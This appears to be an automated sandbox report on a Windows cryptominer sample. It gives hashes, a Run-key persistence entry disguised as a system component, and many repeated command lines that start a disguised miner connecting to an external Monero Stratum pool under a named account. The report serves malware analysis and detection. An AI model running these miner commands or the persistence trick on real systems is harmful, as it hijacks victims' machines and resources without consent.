f78393df5e1e6a6e8d9ab84d4c4f376235398180bce127e9a2170e926d7f8d65

General

Target

f78393df5e1e6a6e8d9ab84d4c4f376235398180bce127e9a2170e926d7f8d65.exe
Size

2.8MB
MD5

9271ea4c15a9702c08647eac23c932d8
SHA1

7699f28181372cd1db025020f033a49664dd9bbe
SHA256

f78393df5e1e6a6e8d9ab84d4c4f376235398180bce127e9a2170e926d7f8d65
SHA512

2034004e2244d612736f309e620e58dbd923137e3d7e23fd1779fe367201dab022fd74e28695d5d6a469f1d8a3ec9625b7c5545deddd2601489aa9b96afb4875

Score

9^/10

miner persistence

Malware Config

Signatures

Detected Stratum cryptominer command
Looks to be attempting to contact Stratum mining pool.
miner

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

Processes:

f78393df5e1e6a6e8d9ab84d4c4f376235398180bce127e9a2170e926d7f8d65.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ShellExperienceHost = "C:\\Users\\Admin\\AppData\\Local\\Temp\\f78393df5e1e6a6e8d9ab84d4c4f376235398180bce127e9a2170e926d7f8d65.exe"	f78393df5e1e6a6e8d9ab84d4c4f376235398180bce127e9a2170e926d7f8d65.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

f78393df5e1e6a6e8d9ab84d4c4f376235398180bce127e9a2170e926d7f8d65.exe

pid	process
1944	f78393df5e1e6a6e8d9ab84d4c4f376235398180bce127e9a2170e926d7f8d65.exe
1944	f78393df5e1e6a6e8d9ab84d4c4f376235398180bce127e9a2170e926d7f8d65.exe
1944	f78393df5e1e6a6e8d9ab84d4c4f376235398180bce127e9a2170e926d7f8d65.exe
1944	f78393df5e1e6a6e8d9ab84d4c4f376235398180bce127e9a2170e926d7f8d65.exe
1944	f78393df5e1e6a6e8d9ab84d4c4f376235398180bce127e9a2170e926d7f8d65.exe
1944	f78393df5e1e6a6e8d9ab84d4c4f376235398180bce127e9a2170e926d7f8d65.exe
1944	f78393df5e1e6a6e8d9ab84d4c4f376235398180bce127e9a2170e926d7f8d65.exe
1944	f78393df5e1e6a6e8d9ab84d4c4f376235398180bce127e9a2170e926d7f8d65.exe
1944	f78393df5e1e6a6e8d9ab84d4c4f376235398180bce127e9a2170e926d7f8d65.exe
1944	f78393df5e1e6a6e8d9ab84d4c4f376235398180bce127e9a2170e926d7f8d65.exe
1944	f78393df5e1e6a6e8d9ab84d4c4f376235398180bce127e9a2170e926d7f8d65.exe
1944	f78393df5e1e6a6e8d9ab84d4c4f376235398180bce127e9a2170e926d7f8d65.exe
1944	f78393df5e1e6a6e8d9ab84d4c4f376235398180bce127e9a2170e926d7f8d65.exe
1944	f78393df5e1e6a6e8d9ab84d4c4f376235398180bce127e9a2170e926d7f8d65.exe
1944	f78393df5e1e6a6e8d9ab84d4c4f376235398180bce127e9a2170e926d7f8d65.exe
1944	f78393df5e1e6a6e8d9ab84d4c4f376235398180bce127e9a2170e926d7f8d65.exe
1944	f78393df5e1e6a6e8d9ab84d4c4f376235398180bce127e9a2170e926d7f8d65.exe
1944	f78393df5e1e6a6e8d9ab84d4c4f376235398180bce127e9a2170e926d7f8d65.exe
1944	f78393df5e1e6a6e8d9ab84d4c4f376235398180bce127e9a2170e926d7f8d65.exe
1944	f78393df5e1e6a6e8d9ab84d4c4f376235398180bce127e9a2170e926d7f8d65.exe
1944	f78393df5e1e6a6e8d9ab84d4c4f376235398180bce127e9a2170e926d7f8d65.exe
1944	f78393df5e1e6a6e8d9ab84d4c4f376235398180bce127e9a2170e926d7f8d65.exe
1944	f78393df5e1e6a6e8d9ab84d4c4f376235398180bce127e9a2170e926d7f8d65.exe
1944	f78393df5e1e6a6e8d9ab84d4c4f376235398180bce127e9a2170e926d7f8d65.exe
1944	f78393df5e1e6a6e8d9ab84d4c4f376235398180bce127e9a2170e926d7f8d65.exe
1944	f78393df5e1e6a6e8d9ab84d4c4f376235398180bce127e9a2170e926d7f8d65.exe
1944	f78393df5e1e6a6e8d9ab84d4c4f376235398180bce127e9a2170e926d7f8d65.exe
1944	f78393df5e1e6a6e8d9ab84d4c4f376235398180bce127e9a2170e926d7f8d65.exe
1944	f78393df5e1e6a6e8d9ab84d4c4f376235398180bce127e9a2170e926d7f8d65.exe
1944	f78393df5e1e6a6e8d9ab84d4c4f376235398180bce127e9a2170e926d7f8d65.exe
1944	f78393df5e1e6a6e8d9ab84d4c4f376235398180bce127e9a2170e926d7f8d65.exe
1944	f78393df5e1e6a6e8d9ab84d4c4f376235398180bce127e9a2170e926d7f8d65.exe
1944	f78393df5e1e6a6e8d9ab84d4c4f376235398180bce127e9a2170e926d7f8d65.exe
1944	f78393df5e1e6a6e8d9ab84d4c4f376235398180bce127e9a2170e926d7f8d65.exe
1944	f78393df5e1e6a6e8d9ab84d4c4f376235398180bce127e9a2170e926d7f8d65.exe
1944	f78393df5e1e6a6e8d9ab84d4c4f376235398180bce127e9a2170e926d7f8d65.exe
1944	f78393df5e1e6a6e8d9ab84d4c4f376235398180bce127e9a2170e926d7f8d65.exe
1944	f78393df5e1e6a6e8d9ab84d4c4f376235398180bce127e9a2170e926d7f8d65.exe
1944	f78393df5e1e6a6e8d9ab84d4c4f376235398180bce127e9a2170e926d7f8d65.exe
1944	f78393df5e1e6a6e8d9ab84d4c4f376235398180bce127e9a2170e926d7f8d65.exe
1944	f78393df5e1e6a6e8d9ab84d4c4f376235398180bce127e9a2170e926d7f8d65.exe
1944	f78393df5e1e6a6e8d9ab84d4c4f376235398180bce127e9a2170e926d7f8d65.exe
1944	f78393df5e1e6a6e8d9ab84d4c4f376235398180bce127e9a2170e926d7f8d65.exe
1944	f78393df5e1e6a6e8d9ab84d4c4f376235398180bce127e9a2170e926d7f8d65.exe
1944	f78393df5e1e6a6e8d9ab84d4c4f376235398180bce127e9a2170e926d7f8d65.exe
1944	f78393df5e1e6a6e8d9ab84d4c4f376235398180bce127e9a2170e926d7f8d65.exe
1944	f78393df5e1e6a6e8d9ab84d4c4f376235398180bce127e9a2170e926d7f8d65.exe
1944	f78393df5e1e6a6e8d9ab84d4c4f376235398180bce127e9a2170e926d7f8d65.exe
1944	f78393df5e1e6a6e8d9ab84d4c4f376235398180bce127e9a2170e926d7f8d65.exe
1944	f78393df5e1e6a6e8d9ab84d4c4f376235398180bce127e9a2170e926d7f8d65.exe
1944	f78393df5e1e6a6e8d9ab84d4c4f376235398180bce127e9a2170e926d7f8d65.exe
1944	f78393df5e1e6a6e8d9ab84d4c4f376235398180bce127e9a2170e926d7f8d65.exe
1944	f78393df5e1e6a6e8d9ab84d4c4f376235398180bce127e9a2170e926d7f8d65.exe
1944	f78393df5e1e6a6e8d9ab84d4c4f376235398180bce127e9a2170e926d7f8d65.exe
1944	f78393df5e1e6a6e8d9ab84d4c4f376235398180bce127e9a2170e926d7f8d65.exe
1944	f78393df5e1e6a6e8d9ab84d4c4f376235398180bce127e9a2170e926d7f8d65.exe
1944	f78393df5e1e6a6e8d9ab84d4c4f376235398180bce127e9a2170e926d7f8d65.exe
1944	f78393df5e1e6a6e8d9ab84d4c4f376235398180bce127e9a2170e926d7f8d65.exe
1944	f78393df5e1e6a6e8d9ab84d4c4f376235398180bce127e9a2170e926d7f8d65.exe
1944	f78393df5e1e6a6e8d9ab84d4c4f376235398180bce127e9a2170e926d7f8d65.exe
1944	f78393df5e1e6a6e8d9ab84d4c4f376235398180bce127e9a2170e926d7f8d65.exe
1944	f78393df5e1e6a6e8d9ab84d4c4f376235398180bce127e9a2170e926d7f8d65.exe
1944	f78393df5e1e6a6e8d9ab84d4c4f376235398180bce127e9a2170e926d7f8d65.exe
1944	f78393df5e1e6a6e8d9ab84d4c4f376235398180bce127e9a2170e926d7f8d65.exe

Suspicious use of WriteProcessMemory 48 IoCs

Processes:

f78393df5e1e6a6e8d9ab84d4c4f376235398180bce127e9a2170e926d7f8d65.exe

description	pid	process	target process
PID 1944 wrote to memory of 2500	1944	f78393df5e1e6a6e8d9ab84d4c4f376235398180bce127e9a2170e926d7f8d65.exe	cmd.exe
PID 1944 wrote to memory of 2500	1944	f78393df5e1e6a6e8d9ab84d4c4f376235398180bce127e9a2170e926d7f8d65.exe	cmd.exe
PID 1944 wrote to memory of 3736	1944	f78393df5e1e6a6e8d9ab84d4c4f376235398180bce127e9a2170e926d7f8d65.exe	cmd.exe
PID 1944 wrote to memory of 3736	1944	f78393df5e1e6a6e8d9ab84d4c4f376235398180bce127e9a2170e926d7f8d65.exe	cmd.exe
PID 1944 wrote to memory of 4744	1944	f78393df5e1e6a6e8d9ab84d4c4f376235398180bce127e9a2170e926d7f8d65.exe	cmd.exe
PID 1944 wrote to memory of 4744	1944	f78393df5e1e6a6e8d9ab84d4c4f376235398180bce127e9a2170e926d7f8d65.exe	cmd.exe
PID 1944 wrote to memory of 3516	1944	f78393df5e1e6a6e8d9ab84d4c4f376235398180bce127e9a2170e926d7f8d65.exe	cmd.exe
PID 1944 wrote to memory of 3516	1944	f78393df5e1e6a6e8d9ab84d4c4f376235398180bce127e9a2170e926d7f8d65.exe	cmd.exe
PID 1944 wrote to memory of 4896	1944	f78393df5e1e6a6e8d9ab84d4c4f376235398180bce127e9a2170e926d7f8d65.exe	cmd.exe
PID 1944 wrote to memory of 4896	1944	f78393df5e1e6a6e8d9ab84d4c4f376235398180bce127e9a2170e926d7f8d65.exe	cmd.exe
PID 1944 wrote to memory of 1384	1944	f78393df5e1e6a6e8d9ab84d4c4f376235398180bce127e9a2170e926d7f8d65.exe	cmd.exe
PID 1944 wrote to memory of 1384	1944	f78393df5e1e6a6e8d9ab84d4c4f376235398180bce127e9a2170e926d7f8d65.exe	cmd.exe
PID 1944 wrote to memory of 4568	1944	f78393df5e1e6a6e8d9ab84d4c4f376235398180bce127e9a2170e926d7f8d65.exe	cmd.exe
PID 1944 wrote to memory of 4568	1944	f78393df5e1e6a6e8d9ab84d4c4f376235398180bce127e9a2170e926d7f8d65.exe	cmd.exe
PID 1944 wrote to memory of 4784	1944	f78393df5e1e6a6e8d9ab84d4c4f376235398180bce127e9a2170e926d7f8d65.exe	cmd.exe
PID 1944 wrote to memory of 4784	1944	f78393df5e1e6a6e8d9ab84d4c4f376235398180bce127e9a2170e926d7f8d65.exe	cmd.exe
PID 1944 wrote to memory of 4776	1944	f78393df5e1e6a6e8d9ab84d4c4f376235398180bce127e9a2170e926d7f8d65.exe	cmd.exe
PID 1944 wrote to memory of 4776	1944	f78393df5e1e6a6e8d9ab84d4c4f376235398180bce127e9a2170e926d7f8d65.exe	cmd.exe
PID 1944 wrote to memory of 1764	1944	f78393df5e1e6a6e8d9ab84d4c4f376235398180bce127e9a2170e926d7f8d65.exe	cmd.exe
PID 1944 wrote to memory of 1764	1944	f78393df5e1e6a6e8d9ab84d4c4f376235398180bce127e9a2170e926d7f8d65.exe	cmd.exe
PID 1944 wrote to memory of 5088	1944	f78393df5e1e6a6e8d9ab84d4c4f376235398180bce127e9a2170e926d7f8d65.exe	cmd.exe
PID 1944 wrote to memory of 5088	1944	f78393df5e1e6a6e8d9ab84d4c4f376235398180bce127e9a2170e926d7f8d65.exe	cmd.exe
PID 1944 wrote to memory of 3640	1944	f78393df5e1e6a6e8d9ab84d4c4f376235398180bce127e9a2170e926d7f8d65.exe	cmd.exe
PID 1944 wrote to memory of 3640	1944	f78393df5e1e6a6e8d9ab84d4c4f376235398180bce127e9a2170e926d7f8d65.exe	cmd.exe
PID 1944 wrote to memory of 4152	1944	f78393df5e1e6a6e8d9ab84d4c4f376235398180bce127e9a2170e926d7f8d65.exe	cmd.exe
PID 1944 wrote to memory of 4152	1944	f78393df5e1e6a6e8d9ab84d4c4f376235398180bce127e9a2170e926d7f8d65.exe	cmd.exe
PID 1944 wrote to memory of 1580	1944	f78393df5e1e6a6e8d9ab84d4c4f376235398180bce127e9a2170e926d7f8d65.exe	cmd.exe
PID 1944 wrote to memory of 1580	1944	f78393df5e1e6a6e8d9ab84d4c4f376235398180bce127e9a2170e926d7f8d65.exe	cmd.exe
PID 1944 wrote to memory of 1492	1944	f78393df5e1e6a6e8d9ab84d4c4f376235398180bce127e9a2170e926d7f8d65.exe	cmd.exe
PID 1944 wrote to memory of 1492	1944	f78393df5e1e6a6e8d9ab84d4c4f376235398180bce127e9a2170e926d7f8d65.exe	cmd.exe
PID 1944 wrote to memory of 1480	1944	f78393df5e1e6a6e8d9ab84d4c4f376235398180bce127e9a2170e926d7f8d65.exe	cmd.exe
PID 1944 wrote to memory of 1480	1944	f78393df5e1e6a6e8d9ab84d4c4f376235398180bce127e9a2170e926d7f8d65.exe	cmd.exe
PID 1944 wrote to memory of 744	1944	f78393df5e1e6a6e8d9ab84d4c4f376235398180bce127e9a2170e926d7f8d65.exe	cmd.exe
PID 1944 wrote to memory of 744	1944	f78393df5e1e6a6e8d9ab84d4c4f376235398180bce127e9a2170e926d7f8d65.exe	cmd.exe
PID 1944 wrote to memory of 1344	1944	f78393df5e1e6a6e8d9ab84d4c4f376235398180bce127e9a2170e926d7f8d65.exe	cmd.exe
PID 1944 wrote to memory of 1344	1944	f78393df5e1e6a6e8d9ab84d4c4f376235398180bce127e9a2170e926d7f8d65.exe	cmd.exe
PID 1944 wrote to memory of 2828	1944	f78393df5e1e6a6e8d9ab84d4c4f376235398180bce127e9a2170e926d7f8d65.exe	cmd.exe
PID 1944 wrote to memory of 2828	1944	f78393df5e1e6a6e8d9ab84d4c4f376235398180bce127e9a2170e926d7f8d65.exe	cmd.exe
PID 1944 wrote to memory of 3980	1944	f78393df5e1e6a6e8d9ab84d4c4f376235398180bce127e9a2170e926d7f8d65.exe	cmd.exe
PID 1944 wrote to memory of 3980	1944	f78393df5e1e6a6e8d9ab84d4c4f376235398180bce127e9a2170e926d7f8d65.exe	cmd.exe
PID 1944 wrote to memory of 1312	1944	f78393df5e1e6a6e8d9ab84d4c4f376235398180bce127e9a2170e926d7f8d65.exe	cmd.exe
PID 1944 wrote to memory of 1312	1944	f78393df5e1e6a6e8d9ab84d4c4f376235398180bce127e9a2170e926d7f8d65.exe	cmd.exe
PID 1944 wrote to memory of 2248	1944	f78393df5e1e6a6e8d9ab84d4c4f376235398180bce127e9a2170e926d7f8d65.exe	cmd.exe
PID 1944 wrote to memory of 2248	1944	f78393df5e1e6a6e8d9ab84d4c4f376235398180bce127e9a2170e926d7f8d65.exe	cmd.exe
PID 1944 wrote to memory of 448	1944	f78393df5e1e6a6e8d9ab84d4c4f376235398180bce127e9a2170e926d7f8d65.exe	cmd.exe
PID 1944 wrote to memory of 448	1944	f78393df5e1e6a6e8d9ab84d4c4f376235398180bce127e9a2170e926d7f8d65.exe	cmd.exe
PID 1944 wrote to memory of 4588	1944	f78393df5e1e6a6e8d9ab84d4c4f376235398180bce127e9a2170e926d7f8d65.exe	cmd.exe
PID 1944 wrote to memory of 4588	1944	f78393df5e1e6a6e8d9ab84d4c4f376235398180bce127e9a2170e926d7f8d65.exe	cmd.exe

C:\Users\Admin\AppData\Local\Temp\f78393df5e1e6a6e8d9ab84d4c4f376235398180bce127e9a2170e926d7f8d65.exe
"C:\Users\Admin\AppData\Local\Temp\f78393df5e1e6a6e8d9ab84d4c4f376235398180bce127e9a2170e926d7f8d65.exe"
1⤵
- Adds Run key to start application
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:1944

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\ProgramData\WindowsTask\MicrosoftShellHost.exe -o stratum+tcp://xmr.pool.minergate.com:45560 -u gancharart@bk.ru -p x -t 1
2⤵
PID:2500

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\ProgramData\WindowsTask\MicrosoftShellHost.exe -o stratum+tcp://xmr.pool.minergate.com:45560 -u gancharart@bk.ru -p x -t 1
2⤵
PID:3736

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\ProgramData\WindowsTask\MicrosoftShellHost.exe -o stratum+tcp://xmr.pool.minergate.com:45560 -u gancharart@bk.ru -p x -t 1
2⤵
PID:4744

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\ProgramData\WindowsTask\MicrosoftShellHost.exe -o stratum+tcp://xmr.pool.minergate.com:45560 -u gancharart@bk.ru -p x -t 1
2⤵
PID:3516

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\ProgramData\WindowsTask\MicrosoftShellHost.exe -o stratum+tcp://xmr.pool.minergate.com:45560 -u gancharart@bk.ru -p x -t 1
2⤵
PID:4896

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\ProgramData\WindowsTask\MicrosoftShellHost.exe -o stratum+tcp://xmr.pool.minergate.com:45560 -u gancharart@bk.ru -p x -t 1
2⤵
PID:1384

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\ProgramData\WindowsTask\MicrosoftShellHost.exe -o stratum+tcp://xmr.pool.minergate.com:45560 -u gancharart@bk.ru -p x -t 1
2⤵
PID:4568

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\ProgramData\WindowsTask\MicrosoftShellHost.exe -o stratum+tcp://xmr.pool.minergate.com:45560 -u gancharart@bk.ru -p x -t 1
2⤵
PID:4784

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\ProgramData\WindowsTask\MicrosoftShellHost.exe -o stratum+tcp://xmr.pool.minergate.com:45560 -u gancharart@bk.ru -p x -t 1
2⤵
PID:4776

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\ProgramData\WindowsTask\MicrosoftShellHost.exe -o stratum+tcp://xmr.pool.minergate.com:45560 -u gancharart@bk.ru -p x -t 1
2⤵
PID:1764

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\ProgramData\WindowsTask\MicrosoftShellHost.exe -o stratum+tcp://xmr.pool.minergate.com:45560 -u gancharart@bk.ru -p x -t 1
2⤵
PID:5088

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\ProgramData\WindowsTask\MicrosoftShellHost.exe -o stratum+tcp://xmr.pool.minergate.com:45560 -u gancharart@bk.ru -p x -t 1
2⤵
PID:3640

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\ProgramData\WindowsTask\MicrosoftShellHost.exe -o stratum+tcp://xmr.pool.minergate.com:45560 -u gancharart@bk.ru -p x -t 1
2⤵
PID:4152

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\ProgramData\WindowsTask\MicrosoftShellHost.exe -o stratum+tcp://xmr.pool.minergate.com:45560 -u gancharart@bk.ru -p x -t 1
2⤵
PID:1580

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\ProgramData\WindowsTask\MicrosoftShellHost.exe -o stratum+tcp://xmr.pool.minergate.com:45560 -u gancharart@bk.ru -p x -t 1
2⤵
PID:1492

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\ProgramData\WindowsTask\MicrosoftShellHost.exe -o stratum+tcp://xmr.pool.minergate.com:45560 -u gancharart@bk.ru -p x -t 1
2⤵
PID:1480

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\ProgramData\WindowsTask\MicrosoftShellHost.exe -o stratum+tcp://xmr.pool.minergate.com:45560 -u gancharart@bk.ru -p x -t 1
2⤵
PID:744

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\ProgramData\WindowsTask\MicrosoftShellHost.exe -o stratum+tcp://xmr.pool.minergate.com:45560 -u gancharart@bk.ru -p x -t 1
2⤵
PID:1344

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\ProgramData\WindowsTask\MicrosoftShellHost.exe -o stratum+tcp://xmr.pool.minergate.com:45560 -u gancharart@bk.ru -p x -t 1
2⤵
PID:2828

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\ProgramData\WindowsTask\MicrosoftShellHost.exe -o stratum+tcp://xmr.pool.minergate.com:45560 -u gancharart@bk.ru -p x -t 1
2⤵
PID:3980

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\ProgramData\WindowsTask\MicrosoftShellHost.exe -o stratum+tcp://xmr.pool.minergate.com:45560 -u gancharart@bk.ru -p x -t 1
2⤵
PID:1312

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\ProgramData\WindowsTask\MicrosoftShellHost.exe -o stratum+tcp://xmr.pool.minergate.com:45560 -u gancharart@bk.ru -p x -t 1
2⤵
PID:2248

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\ProgramData\WindowsTask\MicrosoftShellHost.exe -o stratum+tcp://xmr.pool.minergate.com:45560 -u gancharart@bk.ru -p x -t 1
2⤵
PID:448

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\ProgramData\WindowsTask\MicrosoftShellHost.exe -o stratum+tcp://xmr.pool.minergate.com:45560 -u gancharart@bk.ru -p x -t 1
2⤵
PID:4588

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Registry Run Keys / Startup Folder

1

T1060

Privilege Escalation

Defense Evasion

Modify Registry

1

T1112

Credential Access

Discovery

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

memory/448-158-0x0000000000000000-mapping.dmp

Download
memory/744-152-0x0000000000000000-mapping.dmp

Download
memory/1312-156-0x0000000000000000-mapping.dmp

Download
memory/1344-153-0x0000000000000000-mapping.dmp

Download
memory/1384-141-0x0000000000000000-mapping.dmp

Download
memory/1480-151-0x0000000000000000-mapping.dmp

Download
memory/1492-150-0x0000000000000000-mapping.dmp

Download
memory/1580-149-0x0000000000000000-mapping.dmp

Download
memory/1764-145-0x0000000000000000-mapping.dmp

Download
memory/1944-133-0x0000000140000000-0x0000000140BDF000-memory.dmp

Filesize
11.9MB

Download
memory/1944-130-0x0000000140000000-0x0000000140BDF000-memory.dmp

Filesize
11.9MB

Download
memory/1944-136-0x0000000140000000-0x0000000140BDF000-memory.dmp

Filesize
11.9MB

Download
memory/1944-134-0x0000000140000000-0x0000000140BDF000-memory.dmp

Filesize
11.9MB

Download
memory/1944-132-0x0000000140000000-0x0000000140BDF000-memory.dmp

Filesize
11.9MB

Download
memory/1944-131-0x0000000140000000-0x0000000140BDF000-memory.dmp

Filesize
11.9MB

Download
memory/2248-157-0x0000000000000000-mapping.dmp

Download
memory/2500-135-0x0000000000000000-mapping.dmp

Download
memory/2828-154-0x0000000000000000-mapping.dmp

Download
memory/3516-139-0x0000000000000000-mapping.dmp

Download
memory/3640-147-0x0000000000000000-mapping.dmp

Download
memory/3736-137-0x0000000000000000-mapping.dmp

Download
memory/3980-155-0x0000000000000000-mapping.dmp

Download
memory/4152-148-0x0000000000000000-mapping.dmp

Download
memory/4568-142-0x0000000000000000-mapping.dmp

Download
memory/4588-159-0x0000000000000000-mapping.dmp

Download
memory/4744-138-0x0000000000000000-mapping.dmp

Download
memory/4776-144-0x0000000000000000-mapping.dmp

Download
memory/4784-143-0x0000000000000000-mapping.dmp

Download
memory/4896-140-0x0000000000000000-mapping.dmp

Download
memory/5088-146-0x0000000000000000-mapping.dmp

Download

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Matrix ATT&CK v6

Replay Monitor

Loading Replay Monitor...

Downloads